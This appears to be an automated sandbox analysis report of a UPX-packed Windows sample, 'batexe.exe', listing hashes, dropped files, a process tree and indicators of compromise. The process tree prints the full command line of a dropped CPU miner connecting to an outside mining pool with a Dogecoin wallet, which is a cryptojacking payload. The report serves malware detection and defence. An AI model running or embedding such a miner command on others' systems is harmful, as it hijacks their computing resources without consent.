73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
297s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
14/02/2024, 04:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2376	b2e.exe
2492	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2492	cpuminer-sse2.exe
2492	cpuminer-sse2.exe
2492	cpuminer-sse2.exe
2492	cpuminer-sse2.exe
2492	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4756-4-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4756 wrote to memory of 2376	4756	batexe.exe	74
PID 4756 wrote to memory of 2376	4756	batexe.exe	74
PID 4756 wrote to memory of 2376	4756	batexe.exe	74
PID 2376 wrote to memory of 4708	2376	b2e.exe	77
PID 2376 wrote to memory of 4708	2376	b2e.exe	77
PID 2376 wrote to memory of 4708	2376	b2e.exe	77
PID 4708 wrote to memory of 2492	4708	cmd.exe	78
PID 4708 wrote to memory of 2492	4708	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4756
- C:\Users\Admin\AppData\Local\Temp\A44E.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\A44E.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\A44E.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A6EE.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4708
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2492

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\A44E.tmp\b2e.exe

Filesize
2.9MB

MD5
71443580121be47ed4f7f6775f35bcec

SHA1
ab4cb085ae23ca04cf814ebd92f3a59a0d8eb41f

SHA256
8bd2dcbcf8323c631a700e7ec07fbe10dbc7dc39b6a9597fe448806d99b4b38a

SHA512
39b78201601334eaf8d6adf5825de1f3fac83a2fea2521007318bc1644c60953d9394b8efbd77b45f9c1674995694800d82067b746b47e31606b445043d26c44

Download Submit
C:\Users\Admin\AppData\Local\Temp\A44E.tmp\b2e.exe

Filesize
2.8MB

MD5
1cd1f1463362e82070bd38c1ad8de2d3

SHA1
02b59eedcca64d1bcdbebabb05228cd292c1fdde

SHA256
80c54200113264848b0a02dfef414bee7e1000ae8db116136fad1a6474d43e29

SHA512
f67290611bf4653411f513f696f93add280763b3da208f3ad6a5c2b171fde413daf0d6e4909a13d93a08eed4946e98332ba40d07e39ba686cf356da9d87c355f

Download Submit
C:\Users\Admin\AppData\Local\Temp\A6EE.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
559KB

MD5
c5d003555a4d81f7b482f72a0ab4c672

SHA1
adf05781bb073b3c64f7dc68f42d2222dba1e98b

SHA256
01f92085ae5025863f577983a3a4075e3bcce5cd7b2ff7a6e3d30ddb1538ed0a

SHA512
e5a5949015c9d310a3217f6946477925dbe5bfba052d4502a61dfc8f5e5b46f0f573607bcebad8bbd151a2be2fea38a3798e40da29ba18fe77815a8730674dde

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
595KB

MD5
9a2ed94774a2df2e3c65820d66470279

SHA1
4712cfe8e080cac060bcb8e6849724a9a813c120

SHA256
00dea52671c57a15975c74d148b14f8c83c5105c9fefb17f819192aaa309fdd1

SHA512
9ac7ad0249062024028ea344dba08aef55172a5f56a0f95165c90fb88c6423a5c072e007a462803bb55a70ae88aa98d992aff92e507463ef9fc595a01bb810bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
422KB

MD5
2d596c70499bd9cd10977b368cc23c9c

SHA1
97884aed5a743a79e443b8e8e299ed80d6837c86

SHA256
dde3ad747ede33832cb327508c2bb518acc2b269969ab061bf25a74a5be8de80

SHA512
e5993e9fb4e70b61b25713db841c9a02c95bc76682f07d2c49d456de2b311f07ae7c8538cc7fb968bceeda4db2cb937f0859d83816f62525489eb58a343e2f24

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
235KB

MD5
c36f45ab93611b2e3fbb8d695c7c6f27

SHA1
4d8e3fa6f2d3f42a82bd674b982e33d28faf9e26

SHA256
a9b46fdfb5b52d75455cc5d43108e1c901204c5d0e09d706a73f3582ada49479

SHA512
6f743d068886e8503b256050350b5eb82ba964bc500532961ccc0d3112114b18ddf296f4b0daf17b9572d888e90c1d796d218f43a4f9889799af2040e9f97aa6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
512KB

MD5
a3dea3777f14f1235327b648410a9406

SHA1
9ab139a0c947962b3c471c36e8b9cca4d750c889

SHA256
ff432926dd375c44e9a86cc2520c46e66be2d212e35fb73f16ebc4b48b98b6d1

SHA512
b6cacf9e5d8adebdb3c4ae9b6eaddda6a90d9eae32bdc4cf6eb36ad7cf14d02486ac0c32942e3bc504e943a544fa71a6c9e2fec8fb07c456290646107b4edea2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
213KB

MD5
cb5dac942ba0dc400e63323c7bc94509

SHA1
4370008210ca876aaacdc82e411ebf32f8a7c650

SHA256
b05aef9dfa890a65ce40a8f6ec667a396ee30846c1eba1eb92190c11b3c63f09

SHA512
169dba5a33ba0eb643b3d5ced93896360e05aedd70875cd1b9b288d0a3fee99043b390c499534883699efc20ba91fdefb2737ccf9e35a037103c3827a0432c2a

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
307KB

MD5
3eeeaff751b54809e15edb84f9ff74de

SHA1
2a717c81dd7658638fd38a346f700126b0abbe7d

SHA256
2133e96dc7aee6db5b6eabbc8d14569739a692e0b2dd542d1aeea78d116522d6

SHA512
73f52e06e8622c41d34711694c533603823a1450613a5dd8c46d8e6e188b535a8d87f732e68f7c4864f0deefb73c3a8e5999c87aa97528bf581f1a694824f671

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
232KB

MD5
4970793ed597b9436c5be6583986113f

SHA1
6b3b18b8dc35cf49c3d15082a0107af8cb3f0a22

SHA256
4e55fb72a796ea18fe6b211fb067beb84d6fe477713acb160c6e8c906fb376f8

SHA512
8a6066b8fd86ce7b6597b01c36ebb804287752d99a23fd2f34d18b3f0d794c1f17566993b172c1f8dbdce3537e252e071adfaa18f59bd4d3e00e84e255e1ece8

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
99KB

MD5
07aa1ed9dd6bc0e4507b306ed257fe27

SHA1
f3cef873258d7ae6c54b06138a5f83a266162e32

SHA256
ebb11119179c4fc66b2cd7552707552e6f877d9c05bf8f1a78ca3e73e189d59d

SHA512
3808b983e83541f193a4372367a18a89365658a30bd71b35cde1dc53ca233bd1f3d5cb435dae6cde60bd193045a70988cdcab1f3985e23fa89bfe7aefd099d31

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
119KB

MD5
c17d2ee22f34fa9f5d41583ba95da402

SHA1
8252d5df6557325e7f090f3cecf9061b54438238

SHA256
9bcbbd40421ca4c193f00dcfef70602b5bac419b47496ac3c66a6d79188b06e9

SHA512
0ab9bdffc83f8103406a49b5dd720cddb833cab47aa347f55a0340c294baff2c6337553a8e3b3d61dc48d816d20b49f36b0ae40f9edd74477ce735499b6fd12a

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
276KB

MD5
c1537edb5709773f43992a403d853fec

SHA1
8f65b94f551279e5311a604316ae347af10f9c58

SHA256
ca9c899afc0ba5800416d2467b037e7d023b6de0180f55c1ebd7686559ec7744

SHA512
3c5643bd7ce82da9ec3c5d886b6028001ec9b64902bc53cdfb3d4ce1e0efdd3290c10b295b7203a75587f6fa11ef69379f368a6894a1761e091f767c8b4531de

Download Submit
memory/2376-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2376-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2492-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2492-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2492-42-0x00000000667F0000-0x0000000066888000-memory.dmp

Filesize
608KB

Download
memory/2492-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2492-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/2492-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2492-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2492-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2492-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2492-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2492-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2492-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2492-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2492-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2492-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4756-4-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download